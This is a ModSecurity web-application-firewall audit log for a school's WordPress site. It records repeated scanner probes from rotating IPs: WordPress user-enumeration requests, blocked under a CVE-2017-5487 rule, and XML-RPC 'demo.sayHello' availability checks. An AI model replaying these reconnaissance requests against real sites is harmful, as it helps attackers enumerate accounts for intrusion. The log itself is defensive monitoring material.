ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc77900-Z-- --e3f69c63-A-- [10/May/2025:01:15:33 +0700] aB5GRVqQ1nOVx9fWpZSx0wAAAAw 103.236.140.4 58918 103.236.140.4 8181 --e3f69c63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e3f69c63-C-- demo.sayHello --e3f69c63-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3f69c63-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814533699948 5864 (- - -) Stopwatch2: 1746814533699948 5864; combined=4361, p1=554, p2=3490, p3=33, p4=124, p5=95, sr=100, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3f69c63-Z-- --ede29010-A-- [10/May/2025:01:16:52 +0700] aB5GlFqQ1nOVx9fWpZSx1QAAAAk 103.236.140.4 58924 103.236.140.4 8181 --ede29010-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ede29010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ede29010-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814612878574 3489 (- - -) Stopwatch2: 1746814612878574 3489; combined=1435, p1=484, p2=919, p3=0, p4=0, p5=31, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ede29010-Z-- --712a8266-A-- [10/May/2025:01:16:59 +0700] aB5Gm1qQ1nOVx9fWpZSx1gAAABQ 103.236.140.4 58928 103.236.140.4 8181 --712a8266-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --712a8266-C-- demo.sayHello --712a8266-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --712a8266-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814619248056 6251 (- - -) Stopwatch2: 1746814619248056 6251; combined=4576, p1=605, p2=3690, p3=35, p4=38, p5=124, sr=77, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --712a8266-Z-- --09529911-A-- [10/May/2025:01:17:40 +0700] aB5GxFqQ1nOVx9fWpZSx2QAAABc 103.236.140.4 58936 103.236.140.4 8181 --09529911-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09529911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09529911-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814660724874 3049 (- - -) Stopwatch2: 1746814660724874 3049; combined=1364, p1=457, p2=875, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09529911-Z-- --1f0b935e-A-- [10/May/2025:01:17:47 +0700] aB5Gy1qQ1nOVx9fWpZSx2gAAAAM 103.236.140.4 58940 103.236.140.4 8181 --1f0b935e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1f0b935e-C-- demo.sayHello --1f0b935e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f0b935e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814667067038 5502 (- - -) Stopwatch2: 1746814667067038 5502; combined=4100, p1=557, p2=3312, p3=29, p4=32, p5=100, sr=77, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f0b935e-Z-- --63f37300-A-- [10/May/2025:01:17:49 +0700] aB5GzVqQ1nOVx9fWpZSx2wAAABY 103.236.140.4 58942 103.236.140.4 8181 --63f37300-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63f37300-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63f37300-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814669060711 2038 (- - -) Stopwatch2: 1746814669060711 2038; combined=995, p1=342, p2=626, p3=0, p4=0, p5=27, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63f37300-Z-- --ab74f85e-A-- [10/May/2025:01:17:54 +0700] aB5G0i-fAO47ojYKsMr6TgAAAE0 103.236.140.4 58948 103.236.140.4 8181 --ab74f85e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ab74f85e-C-- demo.sayHello --ab74f85e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab74f85e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814674754992 4730 (- - -) Stopwatch2: 1746814674754992 4730; combined=3713, p1=455, p2=3063, p3=21, p4=24, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab74f85e-Z-- --c346e452-A-- [10/May/2025:01:18:10 +0700] aB5G4loC-7ITMWTA_c9fmQAAANg 103.236.140.4 58952 103.236.140.4 8181 --c346e452-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c346e452-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c346e452-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814690727089 3399 (- - -) Stopwatch2: 1746814690727089 3399; combined=1484, p1=500, p2=943, p3=0, p4=0, p5=40, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c346e452-Z-- --87250b4e-A-- [10/May/2025:01:18:15 +0700] aB5G5y-fAO47ojYKsMr6UQAAAFc 103.236.140.4 58956 103.236.140.4 8181 --87250b4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87250b4e-C-- demo.sayHello --87250b4e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87250b4e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814695060351 4805 (- - -) Stopwatch2: 1746814695060351 4805; combined=3754, p1=454, p2=3086, p3=28, p4=33, p5=90, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87250b4e-Z-- --1b948924-A-- [10/May/2025:01:19:03 +0700] aB5HFy-fAO47ojYKsMr6VwAAAFI 103.236.140.4 58972 103.236.140.4 8181 --1b948924-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1b948924-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b948924-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814743026716 2962 (- - -) Stopwatch2: 1746814743026716 2962; combined=1286, p1=462, p2=794, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b948924-Z-- --9f553805-A-- [10/May/2025:01:19:06 +0700] aB5HGi-fAO47ojYKsMr6WQAAAEY 103.236.140.4 58976 103.236.140.4 8181 --9f553805-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9f553805-C-- demo.sayHello --9f553805-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f553805-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814746975905 4688 (- - -) Stopwatch2: 1746814746975905 4688; combined=3765, p1=475, p2=2975, p3=23, p4=24, p5=147, sr=67, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f553805-Z-- --c0251a1d-A-- [10/May/2025:01:19:10 +0700] aB5HHi-fAO47ojYKsMr6WwAAAE4 103.236.140.4 58980 103.236.140.4 8181 --c0251a1d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0251a1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0251a1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814750533114 2150 (- - -) Stopwatch2: 1746814750533114 2150; combined=1089, p1=357, p2=705, p3=0, p4=0, p5=26, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0251a1d-Z-- --cc78ae5a-A-- [10/May/2025:01:19:15 +0700] aB5HIy-fAO47ojYKsMr6XQAAAE0 103.236.140.4 58984 103.236.140.4 8181 --cc78ae5a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cc78ae5a-C-- demo.sayHello --cc78ae5a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc78ae5a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814755589518 6282 (- - -) Stopwatch2: 1746814755589518 6282; combined=4580, p1=588, p2=3699, p3=94, p4=44, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc78ae5a-Z-- --4011ef43-A-- [10/May/2025:01:20:07 +0700] aB5HVy-fAO47ojYKsMr6XwAAAFg 103.236.140.4 58988 103.236.140.4 8181 --4011ef43-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4011ef43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4011ef43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814807612098 3004 (- - -) Stopwatch2: 1746814807612098 3004; combined=1342, p1=490, p2=822, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4011ef43-Z-- --8f61794c-A-- [10/May/2025:01:20:12 +0700] aB5HXC-fAO47ojYKsMr6YQAAAEA 103.236.140.4 58992 103.236.140.4 8181 --8f61794c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8f61794c-C-- demo.sayHello --8f61794c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f61794c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746814812925089 16875 (- - -) Stopwatch2: 1746814812925089 16875; combined=27986, p1=463, p2=3190, p3=29, p4=34, p5=12148, sr=86, sw=69, l=0, gc=12053 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f61794c-Z-- --72210d4d-A-- [10/May/2025:01:21:22 +0700] aB5HolqQ1nOVx9fWpZSx3QAAAAo 103.236.140.4 58996 103.236.140.4 8181 --72210d4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --72210d4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72210d4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814882179540 3211 (- - -) Stopwatch2: 1746814882179540 3211; combined=1370, p1=464, p2=874, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72210d4d-Z-- --51c8590a-A-- [10/May/2025:01:21:28 +0700] aB5HqC-fAO47ojYKsMr6ZAAAAEI 103.236.140.4 59004 103.236.140.4 8181 --51c8590a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --51c8590a-C-- demo.sayHello --51c8590a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --51c8590a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 